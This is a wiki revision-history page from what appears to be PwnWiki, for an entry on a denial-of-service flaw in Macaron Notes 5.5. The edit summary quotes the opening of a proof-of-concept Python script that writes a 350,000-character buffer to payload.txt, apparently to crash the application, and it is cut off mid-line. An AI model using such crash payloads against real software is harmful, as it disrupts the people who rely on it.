Revision history of "Macaron Notes great notebook 5.5 拒絕服務漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 20:03, 4 June 2021Pwnwiki talk contribs 211 bytes +211 Created page with "==POC== <pre> #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: pri..."